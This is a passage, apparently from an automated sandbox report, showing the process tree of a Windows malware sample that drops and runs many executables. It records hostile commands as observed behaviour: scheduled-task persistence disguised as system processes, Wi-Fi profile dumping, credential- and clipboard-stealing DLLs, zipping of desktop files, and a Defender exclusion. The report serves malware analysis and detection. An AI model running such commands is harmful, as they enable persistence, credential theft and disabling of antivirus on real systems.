                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
                                                                                                                                                            "x2s443bc.cs1.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:4416
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-95D21.tmp\x2s443bc.cs1.tmp
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-95D21.tmp\x2s443bc.cs1.tmp" /SL5="$601F0,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5076
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1028 -ip 1028
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4884
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 4928 -ip 4928
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2884
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "TEMPEX~1" /sc ONLOGON /tr "'C:\Documents and Settings\TEMPEX~1.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • DcRat
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:6080
                                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:5536
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • DcRat
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:5680
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "Endermanch@NoMoreRansom" /sc ONLOGON /tr "'C:\Users\All Users\SoftwareDistribution\[email protected]'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • DcRat
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:3932
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • DcRat
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:2292
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ProximityServicePal\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • DcRat
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:5524
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "Endermanch@NoMoreRansom" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Endermanch@WannaCrypt0r\[email protected]'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • DcRat
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:5144
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Documents and Settings\conhost.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • DcRat
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:1008
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\vpnclientpsprovider\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                                                                                            1⤵
                                                                                                                                                            • DcRat
                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:284
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5720 -ip 5720
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5176
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\InboxApps\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:6040
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "ama" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swiiiii\ama.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:2956
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\msscntrs\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:5712
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "bot" /sc ONLOGON /tr "'C:\Users\Admin\SendTo\bot.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:1996
                                                                                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                              C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004DC
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:4960
                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                              "C:\Windows\svchost.com" "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                                                                                              1⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              PID:3416
                                                                                                                                                              • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe --profile-directory=Default
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                • Checks system information in the registry
                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                • System policy modification
                                                                                                                                                                PID:1124
                                                                                                                                                                • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                  C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 --annotation=exe=C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc0cdd3cb8,0x7ffc0cdd3cc8,0x7ffc0cdd3cd8
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5752
                                                                                                                                                                • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,18114615879004575012,5836900519846344865,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:2
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:552
                                                                                                                                                                • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,18114615879004575012,5836900519846344865,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:4152
                                                                                                                                                                • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,18114615879004575012,5836900519846344865,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2304
                                                                                                                                                                • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,18114615879004575012,5836900519846344865,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4636
                                                                                                                                                                  • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,18114615879004575012,5836900519846344865,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3424
                                                                                                                                                                    • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,18114615879004575012,5836900519846344865,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:960
                                                                                                                                                                      • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,18114615879004575012,5836900519846344865,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:2900
                                                                                                                                                                        • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,18114615879004575012,5836900519846344865,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5488
                                                                                                                                                                      • C:\Windows\svchost.com
                                                                                                                                                                        "C:\Windows\svchost.com" "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --profile-directory=Default
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                        PID:2392
                                                                                                                                                                        • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                          C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe --profile-directory=Default
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • System policy modification
                                                                                                                                                                          PID:5456
                                                                                                                                                                          • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                            C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 --annotation=exe=C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc0cdd3cb8,0x7ffc0cdd3cc8,0x7ffc0cdd3cd8
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:4104
                                                                                                                                                                          • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1720,10071240928032560032,4219802856218643978,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1872 /prefetch:2
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:3404
                                                                                                                                                                          • C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,10071240928032560032,4219802856218643978,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:876
                                                                                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:984
                                                                                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2492
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:3000
                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100098~1\ALEXXX~1.EXE"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                              PID:1924
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\100098~1\ALEXXX~1.EXE
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\100098~1\ALEXXX~1.EXE
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                PID:5308
                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:5976
                                                                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5448
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\CONFIG~1\propro.exe
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                                                        PID:2136
                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Roaming\CONFIG~1\traffic.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3036
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\CONFIG~1\traffic.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\CONFIG~1\traffic.exe
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:3440
                                                                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100105~1\gold.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                    PID:4568
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\100105~1\gold.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\100105~1\gold.exe
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:1360
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4852
                                                                                                                                                                                    • C:\Windows\svchost.com
                                                                                                                                                                                      "C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:6000
                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                          C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:4728
                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                            C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:5592
                                                                                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                                                                                              netsh wlan show profiles
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:5224
                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:6056
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\777591257247_Desktop.zip' -CompressionLevel Optimal
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:6536
                                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              PID:6676
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                PID:6712
                                                                                                                                                                                                • C:\Windows\svchost.com
                                                                                                                                                                                                  "C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe" /F
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                  PID:6952
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN NewB.exe /TR C:\Users\Admin\AppData\Local\Temp\100105~2\NewB.exe /F
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:7028
                                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100107~1\swiiiii.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                              PID:7108
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\100107~1\swiiiii.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\100107~1\swiiiii.exe
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                PID:7164
                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:5896
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 880
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:6308
                                                                                                                                                                                              • C:\Windows\svchost.com
                                                                                                                                                                                                "C:\Windows\svchost.com" "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                PID:6996
                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                  C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  PID:6952
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                PID:6304
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • DcRat
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:6212
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:3452
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • DcRat
                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                    PID:1728
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5516
                                                                                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100108~1\random.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                    PID:6488
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\100108~1\random.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\100108~1\random.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      PID:4420
                                                                                                                                                                                                  • C:\Windows\svchost.com
                                                                                                                                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:6424
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • UAC bypass
                                                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                                                        • Windows security modification
                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        • System policy modification
                                                                                                                                                                                                        PID:7000
                                                                                                                                                                                                        • C:\Windows\svchost.com
                                                                                                                                                                                                          "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\100108~2\FILE30~1.EXE" -Force
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:1604
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
